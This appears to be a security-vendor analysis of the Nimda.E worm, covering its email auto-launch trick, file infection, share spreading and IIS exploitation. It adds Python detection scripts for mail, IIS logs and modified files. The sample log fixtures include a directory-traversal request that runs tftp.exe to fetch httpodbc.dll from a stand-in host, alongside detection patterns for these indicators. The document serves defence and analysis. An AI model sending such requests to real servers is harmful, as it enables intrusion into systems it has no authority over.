W32/Nimda.E@mm
Analysis
- Viral body is 57344 bytes and is prepended to EXE files
- Virus uses various exploit and infection methods in order to infect the potential host:
  - Malformed MIME header and IFrame exploit within email propagation
  - INDEX.HTML / DEFAULT.HTML file load insertion - files are modified to load the infectious README.EML
  - SYSTEM.INI file load insertion
  - EXE infection - virus prepends itself to target files
  - Network spreading - virus attempts to connect to open shares and copy itself to these locations
  - Infectious README.EML / DESKTOP.EML placed in all folders
  - IP scanning to identify IIS systems and using a malformed GET request - the response uploads the infectious httpodbc.dll to the target system and executes it
  - Hiding extensions of known file types - this aids in the launch of an executable with an inappropriate file icon
- Malformed MIME header and IFrame exploit within email propagation
  - Virus arrives as an attachment from infected users in a message structured such that a malformed MIME header exploit coupled with an IFrame exploit will cause the attachment to launch automatically when the message is either opened or previewed in Outlook
  - The message contains two parts: one is script containing the IFrame exploit, which invokes the second part; the second part is mislabeled on purpose with an inappropriate Content-Type of "audio/x-wav". This is done in an effort to automatically launch the attachment, commonly named "sample.exe".
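As an added example (not code from the original page or from Fortinet), the following Python scan applies the two-part message structure described above as a mail-gateway check: it parses a message with the standard library, pulls any `cid:` target out of an IFrame in the HTML part, and flags a part whose Content-Type says "audio/x-wav" (or another media type) while its filename ends in ".exe" or its decoded payload starts with the MZ executable header. The sample message, its boundary, its Content-ID value and the base64 stub are constructed for this example.

```python
import email
import re
from email import policy

# Constructed message modelled on the structure described above: an HTML part
# whose zero-size IFrame points, via a cid: reference, at a second part that
# carries an .exe attachment under the Content-Type audio/x-wav. The boundary,
# the Content-ID value and the base64 stub (a bare MZ header) are made up.
SAMPLE_MESSAGE = """\
From: sender@example.invalid
To: recipient@example.invalid
Subject: constructed sample
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="constructed-boundary-0001"

--constructed-boundary-0001
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:CONSTRUCTEDCID01 height=3D0 width=3D0></iframe>
</BODY></HTML>

--constructed-boundary-0001
Content-Type: audio/x-wav; name="sample.exe"
Content-Transfer-Encoding: base64
Content-ID: <CONSTRUCTEDCID01>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAA
--constructed-boundary-0001--
"""

HIDDEN_IFRAME = re.compile(
    r'<iframe[^>]*\bsrc\s*=\s*["\']?cid:([^"\'\s>]+)', re.IGNORECASE)

# Content-Types a mail client treats as passive media rather than a program
MEDIA_TYPES = {"audio/x-wav", "audio/wav", "audio/x-midi", "image/gif", "image/jpeg"}
EXEC_EXTENSIONS = (".exe", ".com", ".scr", ".pif", ".bat")


def scan_message(raw: str) -> dict:
    """Return the indicators found in one RFC 822 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    report = {"iframe_cids": [], "mislabelled": [], "pe_payloads": [], "auto_launch": False}
    names_by_cid = {}
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        if ctype == "text/html":
            # get_content() undoes the quoted-printable encoding for us
            report["iframe_cids"] += HIDDEN_IFRAME.findall(part.get_content())
            continue
        filename = part.get_filename() or ""
        if ctype in MEDIA_TYPES and filename.lower().endswith(EXEC_EXTENSIONS):
            report["mislabelled"].append((ctype, filename))
        payload = part.get_payload(decode=True) or b""
        if payload[:2] == b"MZ":  # DOS/PE executable header behind a media label
            report["pe_payloads"].append(filename)
        cid = str(part.get("Content-ID", "")).strip().strip("<>")
        if cid:
            names_by_cid[cid] = filename
    # The auto-launch chain: a hidden IFrame whose cid: resolves to a mislabelled executable
    mislabelled_names = {name for _, name in report["mislabelled"]}
    report["auto_launch"] = any(
        names_by_cid.get(cid) in mislabelled_names for cid in report["iframe_cids"])
    return report


if __name__ == "__main__":
    print(scan_message(SAMPLE_MESSAGE))
```

The three checks are deliberately independent: a message can be caught on the type/extension mismatch alone, on the MZ header alone, or on the IFrame-to-attachment chain, so renaming the attachment or changing the declared type does not defeat all of them at once.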
- When first executed, the virus writes two files into the Windows\Temp folder and executes one of them; the files may be named similar to "mepF050.TMP.exe". The virus also writes a WININIT.INI configuration file which deletes the files written to the Temp folder at the next Windows startup.
- Virus writes itself as "load.exe" to the Windows\System folder, then modifies the SYSTEM.INI file to run the virus secondary to loading the shell Explorer.exe, with the parameter "-dontrunold"
- Virus modifies the registry to hide the extensions of known file types and to not display hidden files. If infected users attempt to change these values manually within the "View | Folder Options" menu option in a folder view, the settings are reset by the virus so that extensions stay hidden and hidden files are still not displayed.
- Virus attempts to scan IP addresses in search of a system running IIS in an effort to infect that host. The virus uses a directory traversal exploit in order to send a malformed "GET httpodbc.dll" request, which in turn triggers the target to request the infectious httpodbc.dll from the requestor via TFTP.
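As an added example (not code from the original page or from Fortinet), here is a Python pass over IIS W3C-format log lines that looks for the request sequence described above: a percent-encoded traversal in the URI stem, a request naming httpodbc.dll, or a query that invokes TFTP. The log excerpt, the client addresses and the field layout are constructed for this example; the decoding loop matters because a single `unquote` misses double-encoded separators such as `%255c`.

```python
import urllib.parse

# Constructed IIS W3C-style log excerpt, trimmed to the fields the check needs.
# Client addresses come from the 192.0.2.0/24 documentation range; the requests
# model the traversal / "GET httpodbc.dll" / TFTP sequence described above.
SAMPLE_LOG = """\
#Software: constructed sample
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-10-30 12:00:01 192.0.2.10 GET /index.html - 200
2001-10-30 12:00:02 192.0.2.77 GET /scripts/..%5c../winnt/system32/tftp.exe -i+192.0.2.77+GET+httpodbc.dll 200
2001-10-30 12:00:03 192.0.2.77 GET /scripts/httpodbc.dll - 200
2001-10-30 12:00:04 192.0.2.10 GET /images/logo.gif - 304
2001-10-30 12:00:05 192.0.2.78 GET /scripts/..%255c../winnt/system32/tftp.exe - 404
"""

# Strings taken from this page's description of the IIS infection sequence
INDICATORS = ("httpodbc.dll", "tftp")


def parse_iis_log(text: str) -> list:
    """Turn W3C extended log lines into dicts keyed by the names in the #Fields header."""
    fields, entries = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            entries.append(dict(zip(fields, line.split())))
    return entries


def normalize_uri(uri: str) -> str:
    """Percent-decode repeatedly (catches double encoding), unify separators, lowercase."""
    decoded = uri
    for _ in range(3):
        step = urllib.parse.unquote(decoded)
        if step == decoded:
            break
        decoded = step
    return decoded.replace("\\", "/").lower()


def classify(entry: dict) -> set:
    """Tag one request with the traversal and payload indicators it carries."""
    stem = normalize_uri(entry.get("cs-uri-stem", ""))
    query = normalize_uri(entry.get("cs-uri-query", ""))
    tags = set()
    if "/../" in stem or stem.endswith("/.."):
        tags.add("directory-traversal")
    for indicator in INDICATORS:
        if indicator in stem or indicator in query:
            tags.add(indicator)
    return tags


def find_suspicious(text: str) -> list:
    """Return (client ip, sorted tags) for every request that matched at least one indicator."""
    hits = []
    for entry in parse_iis_log(text):
        tags = classify(entry)
        if tags:
            hits.append((entry["c-ip"], sorted(tags)))
    return hits


if __name__ == "__main__":
    for ip, tags in find_suspicious(SAMPLE_LOG):
        print(ip, ", ".join(tags))
```

A 404 on the traversal request (the last sample line) is still worth surfacing: it shows a scanning source even when the target was not vulnerable, which is the IP-scanning behaviour the analysis describes.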
- httpodbc.dll is then executed on the target system and infects files matching these names, where .XXX can be .asp, .htm or .html:
  - Index.XXX
  - Default.XXX
  - Main.XXX
  The virus drops a file "Readme.eml" on the target and modifies the qualifying files to load the .eml file using the HTML instruction "refresh".
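As an added example (not code from the original page or from Fortinet), the following Python triage checks cover the two file modifications described on this page: the SYSTEM.INI shell line that chains load.exe with "-dontrunold" after Explorer.exe, and the "refresh" inserted into Index/Default/Main pages to load Readme.eml. The clean and modified file contents are constructed; the exact layout of the modified shell= line and of the injected refresh markup are assumptions based on the page's description.

```python
import re

# Constructed SYSTEM.INI fragments: a clean [boot] section and one that carries
# the load.exe / -dontrunold modification described above. The exact layout of
# the modified shell= line is an assumption based on this page's description.
CLEAN_SYSTEM_INI = """\
[boot]
shell=Explorer.exe
"""
INFECTED_SYSTEM_INI = """\
[boot]
shell=Explorer.exe load.exe -dontrunold
"""

# Constructed HTML pages: one untouched, one carrying a "refresh" to readme.eml
# as described above (the precise injected markup is an assumption).
CLEAN_HTML = "<html><body><h1>Welcome</h1></body></html>"
INFECTED_HTML = (
    '<html><head><meta http-equiv="refresh" content="0;url=readme.eml"></head>'
    "<body><h1>Welcome</h1></body></html>"
)

SHELL_LINE = re.compile(r"^\s*shell\s*=\s*(.*)$", re.IGNORECASE | re.MULTILINE)
REFRESH_TO_EML = re.compile(
    r'http-equiv\s*=\s*["\']?refresh["\']?[^>]*url\s*=\s*["\']?([^"\'\s>]+\.eml)',
    re.IGNORECASE)
DROPPED_NAMES = re.compile(r"\b(?:readme|desktop)\.(?:eml|nws)\b", re.IGNORECASE)


def check_system_ini(text: str) -> list:
    """Return any programs chained after the shell on the shell= line (empty when clean)."""
    match = SHELL_LINE.search(text)
    if not match:
        return []
    tokens = match.group(1).split()
    # Only the shell itself belongs on this line; every extra token is something
    # the shell has been told to launch and deserves a look.
    return tokens[1:]


def check_html(text: str) -> list:
    """Return indicators of the README.EML load insertion in one HTML document."""
    findings = [f"refresh->{target}" for target in REFRESH_TO_EML.findall(text)]
    if DROPPED_NAMES.search(text):
        findings.append("references a readme/desktop .eml or .nws file")
    return findings


if __name__ == "__main__":
    print("system.ini:", check_system_ini(INFECTED_SYSTEM_INI))
    print("html:", check_html(INFECTED_HTML))
```

Both checks work on file contents rather than filenames, so they can be run from a clean boot environment over a mounted disk image; the same DROPPED_NAMES pattern applied to a directory listing finds the README.EML / DESKTOP.EML copies the page says are placed in every folder.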
- Virus copies itself to numerous locations as the following files:
  - readme.nws
  - readme.eml
  - httpodbc.dll
  - sample.exe
  - Riched20.dll (in folders containing .DOC files)
- Virus modifies the registry to share all local drives C through Z; after a Windows restart, the drives are fully shared. The virus then attempts to copy itself to systems available across the network.
- Virus contains the following string:
  Concept Virus(CV) V.6, Copyright(C)2001,
  (This's CV, No Nimda.)
Telemetry
Detection Availability
| Product | Detection availability |
|---|---|
| FortiGate | Extreme |
| FortiClient | Extended |
| FortiMail | Extended |
| FortiSandbox | Extended |
| FortiWeb | Extended |
| Web Application Firewall | Extended |
| FortiIsolator | Extended |
| FortiDeceptor | Extended |
| FortiEDR | |